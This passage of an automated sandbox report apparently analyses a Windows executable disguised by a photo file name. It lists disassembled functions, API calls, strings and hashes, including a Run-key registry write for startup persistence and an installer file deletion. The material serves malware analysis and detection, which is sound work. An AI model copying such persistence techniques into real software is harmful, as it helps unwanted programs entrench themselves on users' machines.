                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throwstd::exception::exception$_sprintf_strlen
                                                                • String ID: %02x$MD5::hex_digest: Can't get digest if you haven't $finalized the digest!
                                                                • API String ID: 2673636488-1020120221
                                                                • Opcode ID: b5ef949973ff170ae46ed2302c640035ab426ea44832cb315f8c0f38354fa56a
                                                                • Instruction ID: 379c6c264d463ca41d998aea5d3418ce68db7dffb7727235561d622e308975a5
                                                                • Opcode Fuzzy Hash: b5ef949973ff170ae46ed2302c640035ab426ea44832cb315f8c0f38354fa56a
                                                                • Instruction Fuzzy Hash: 1C11CAB19403006ED305DF7AE8016627BE8FF54309B14457BE844CB643E276965A8BE4
                                                                Function 004510B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(0000001C,3D09168B,00000000,00000000,?,00000000,00598E08,000000FF,?,004511E1,00000000,?,00000000,000000FF,?,00000000), ref: 004510E0
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00451115
                                                                • LeaveCriticalSection.KERNEL32(0000001C,?,00000008,00000000,3D09168B,00000000,00000000,?,00000000,00598E08,000000FF,?,004511E1,00000000,?,00000000), ref: 0045112E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeaveXinvalid_argumentstd::_
                                                                • String ID: list<T> too long
                                                                • API String ID: 223440047-4027344264
                                                                • Opcode ID: 8c94dd5f2ae0d5e6c2ad1d1d1fedf38c12eddaa7f78d7019c81a55d3ebf72089
                                                                • Instruction ID: 56d328cabe77408cc085a246bcc77a680f32d01a66009494466c45611b2cf2be
                                                                • Opcode Fuzzy Hash: 8c94dd5f2ae0d5e6c2ad1d1d1fedf38c12eddaa7f78d7019c81a55d3ebf72089
                                                                • Instruction Fuzzy Hash: CB11A0B2600B05AFC704DF54D981AAAB7BCFB09710F008A6EED1283B41DB35E904CBA4
                                                                Function 0041734A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00417365
                                                                • SetCursor.USER32(00000000), ref: 0041736C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Cursor$Load
                                                                • String ID: menu$timer
                                                                • API String ID: 1675784387-2593718399
                                                                • Opcode ID: 5a5f61f08477010504d84a60e5983983989bb98b35a9cc66910e9dd24bd03bf6
                                                                • Instruction ID: c2dc5c4b96223e37cc9eee33d40f7505a590eaa06ed436827efc64f1906cbca9
                                                                • Opcode Fuzzy Hash: 5a5f61f08477010504d84a60e5983983989bb98b35a9cc66910e9dd24bd03bf6
                                                                • Instruction Fuzzy Hash: 9411063020C508DBCB254B14C844BEE77B5AB55310F50056BEDA6C7381CB79ACC1E7AA
                                                                Function 004EA1A0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __wgetenv
                                                                • String ID: .\crypto\conf\conf_mod.c$OPENSSL_CONF$openssl.cnf
                                                                • API String ID: 1112669753-3004400454
                                                                • Opcode ID: a85d8682f31526d4b87bf34262afeab5c5696e29303ab467e919ebea6f109ef1
                                                                • Instruction ID: a7d4d9a0c34a72cb63850331535c7f21598f9a4ee1aab39499a937b94186e355
                                                                • Opcode Fuzzy Hash: a85d8682f31526d4b87bf34262afeab5c5696e29303ab467e919ebea6f109ef1
                                                                • Instruction Fuzzy Hash: A7F02B71A4416036D51132277C0BFFF5A5C9ED3B19F194476FD00A6242EA4CB61681FE
                                                                Function 00448DF0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,00000001,?,?,?,00404F58,Duoyi.com-Launcher), ref: 00448E13
                                                                • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,00000000,?,?,00404F58,Duoyi.com-Launcher), ref: 00448E44
                                                                • RegCloseKey.ADVAPI32(00000000,?,00404F58,Duoyi.com-Launcher), ref: 00448E4E
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00448E02
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenValue
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                • API String ID: 779948276-1428018034
                                                                • Opcode ID: 783dfbd1f27abb3bc78d0eb8d7acc839ab78ae9d54f6624585ca1f626d16bd3b
                                                                • Instruction ID: 830a1417276abc8b619e47a9882b77e2ec03e2e7068c5bd5d5499eb52c511116
                                                                • Opcode Fuzzy Hash: 783dfbd1f27abb3bc78d0eb8d7acc839ab78ae9d54f6624585ca1f626d16bd3b
                                                                • Instruction Fuzzy Hash: 6A016D31640304FBEB209F54ED49FAAB3BCEB11751F20015AF90AD7640EAB5AD05E7A5
                                                                Function 00405F83 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45filetimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00405F8A
                                                                • KillTimer.USER32(?,0000000C,0000003C), ref: 00405FA7
                                                                • DeleteFileW.KERNEL32(?), ref: 00405FFA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: DeleteFileH_prolog3_KillTimer
                                                                • String ID: dyinstaller.exe
                                                                • API String ID: 1779057518-73502201
                                                                • Opcode ID: 9aa079f802eece97dc3286085891300262fac33b96869eb58f1c253e17ac67a9
                                                                • Instruction ID: f82899bb4414a822433d8a878f71d4a1f8714aa5f82957a3dde25fbb16c3411d
                                                                • Opcode Fuzzy Hash: 9aa079f802eece97dc3286085891300262fac33b96869eb58f1c253e17ac67a9
                                                                • Instruction Fuzzy Hash: 2D01A171D002149BDF00EFE5C84AACEBBB8BF14705F04843AFA01BB181C6796A44CBA9
                                                                Function 0248098F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • ___BuildCatchObject.LIBCMT ref: 024809A2
                                                                  • Part of subcall function 024808FD: ___BuildCatchObjectHelper.LIBCMT ref: 02480933
                                                                • _UnwindNestedFrames.LIBCMT ref: 024809B9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                • String ID: csm$csm
                                                                • API String ID: 3487967840-3733052814
                                                                • Opcode ID: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                                                • Instruction ID: a8facd808322f288dca5f59879c054cff78656ec8362b7f01660ad4b3a4dbbd5
                                                                • Opcode Fuzzy Hash: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                                                • Instruction Fuzzy Hash: F8012431020209BBEF12AE52CC44EEF3F6AEF18394F004016BD1915120D736D8A5DFA0
                                                                Function 1001098B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • ___BuildCatchObject.LIBCMT ref: 1001099E
                                                                  • Part of subcall function 100108F9: ___BuildCatchObjectHelper.LIBCMT ref: 1001092F
                                                                • _UnwindNestedFrames.LIBCMT ref: 100109B5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                • String ID: csm$csm
                                                                • API String ID: 3487967840-3733052814
                                                                • Opcode ID: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                                                • Instruction ID: 14b1107ce5288ea1db0b61008beba539b652f12cac3eb1ffe8717002ad162d0f
                                                                • Opcode Fuzzy Hash: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                                                • Instruction Fuzzy Hash: 6701E87550150ABBEF12DF51CC45EAB7E6AEF08390F104010BD9859121DBB2E9A1DBA1
                                                                Function 00487D00 Relevance: 6.3, APIs: 4, Instructions: 317COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memmove_strpbrk
                                                                • String ID:
                                                                • API String ID: 1758035326-0
                                                                • Opcode ID: 3ddccdca4f6081deed4a5a4f54b26619f87cea5f6f137f6b7457ab883c7ef310
                                                                • Instruction ID: 99bcbbb30110ce9a5f6b00f98b7e7401c92ede23fcd5a98651c83f7f92bcc7ed
                                                                • Opcode Fuzzy Hash: 3ddccdca4f6081deed4a5a4f54b26619f87cea5f6f137f6b7457ab883c7ef310
                                                                • Instruction Fuzzy Hash: C1C14A70D00204DFDB20FF68C891AEEBBB4BF15304F54896EE14667282D7799A49CBA5
                                                                Function 0042FCC2 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _malloc
                                                                • String ID:
                                                                • API String ID: 1579825452-0
                                                                • Opcode ID: 57e89b97f7721990b586f4a07f27c047001930b3b786d87a385714a36ba6a07b
                                                                • Instruction ID: 14cdcb4125077ba05ecde7c2c21c7e040626c673fa21e09be1adb89d1dbeeab6
                                                                • Opcode Fuzzy Hash: 57e89b97f7721990b586f4a07f27c047001930b3b786d87a385714a36ba6a07b
                                                                • Instruction Fuzzy Hash: A291D371E00228DFDB24CFA9D981B9DBBB5FF48314F6081AEE519AB251DB309984CF44
                                                                Function 00411630 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ClientRect$ScreenWindowZoomed
                                                                • String ID:
                                                                • API String ID: 1238700444-0
                                                                • Opcode ID: d4a8c97783dfdaa123cac4797eb170ed2b001490819f47d2ffcde0b97e7c1317
                                                                • Instruction ID: 52dbea9678d1fe291bf774618c9387b7e386f0bb307b76429567159e9160188a
                                                                • Opcode Fuzzy Hash: d4a8c97783dfdaa123cac4797eb170ed2b001490819f47d2ffcde0b97e7c1317
                                                                • Instruction Fuzzy Hash: 89513D31E01109DFCF04DFA8D981AEEB7B6EF04304F14802AE915BB2A1D775A981CF29
                                                                Function 00428F97 Relevance: 6.1, APIs: 4, Instructions: 128COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 00428FC7
                                                                • _memset.LIBCMT ref: 00428FE2
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000103,00000000,00000000,?,?,00000000), ref: 00428FFE
                                                                • _strlen.LIBCMT ref: 0042900B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide_memset_strlen_wcslen
                                                                • String ID:
                                                                • API String ID: 2592629372-0
                                                                • Opcode ID: c5374c4544441d11179f2df72cb616c13356cc6a199b11fa97b966aea92a6034
                                                                • Instruction ID: 7468aa5e33ac1bf574ae05416cb6ef4520d81944edea10f146fab554c7491bd9
                                                                • Opcode Fuzzy Hash: c5374c4544441d11179f2df72cb616c13356cc6a199b11fa97b966aea92a6034
                                                                • Instruction Fuzzy Hash: B9414071A0012C5EDB24DE24AC819EF737DEF14314F90096FE116C3281DA389D898B69
                                                                Function 0045A800 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::exception::exception.LIBCMT ref: 0045A939
                                                                • __CxxThrowException@8.LIBCMT ref: 0045A94E
                                                                • std::exception::exception.LIBCMT ref: 0045A95D
                                                                • __CxxThrowException@8.LIBCMT ref: 0045A972
                                                                  • Part of subcall function 0048A378: std::exception::exception.LIBCMT ref: 0048A3C7
                                                                  • Part of subcall function 0048A378: std::exception::exception.LIBCMT ref: 0048A3E1
                                                                  • Part of subcall function 0048A378: __CxxThrowException@8.LIBCMT ref: 0048A3F2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                • String ID:
                                                                • API String ID: 2621100827-0
                                                                • Opcode ID: bcb2f0df25fa84b6703bd1c12b4465f8d521f5e93e2433afa7e01c5e1ca21d32
                                                                • Instruction ID: ebf0ee602c413e16badf586f41ce912db6f5e6b7a75b5ad53ee23a96d0a47a4d
                                                                • Opcode Fuzzy Hash: bcb2f0df25fa84b6703bd1c12b4465f8d521f5e93e2433afa7e01c5e1ca21d32
                                                                • Instruction Fuzzy Hash: 584139B1900745AFD710DF69D885BDBFBE4FF09304F40892EE56A93241E7B86604CB95
                                                                Function 024841E9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0248421D
                                                                • __isleadbyte_l.LIBCMT ref: 02484250
                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,0247A58F,?,00000000,00000000,?,?,?,?,0247A58F,00000000), ref: 02484281
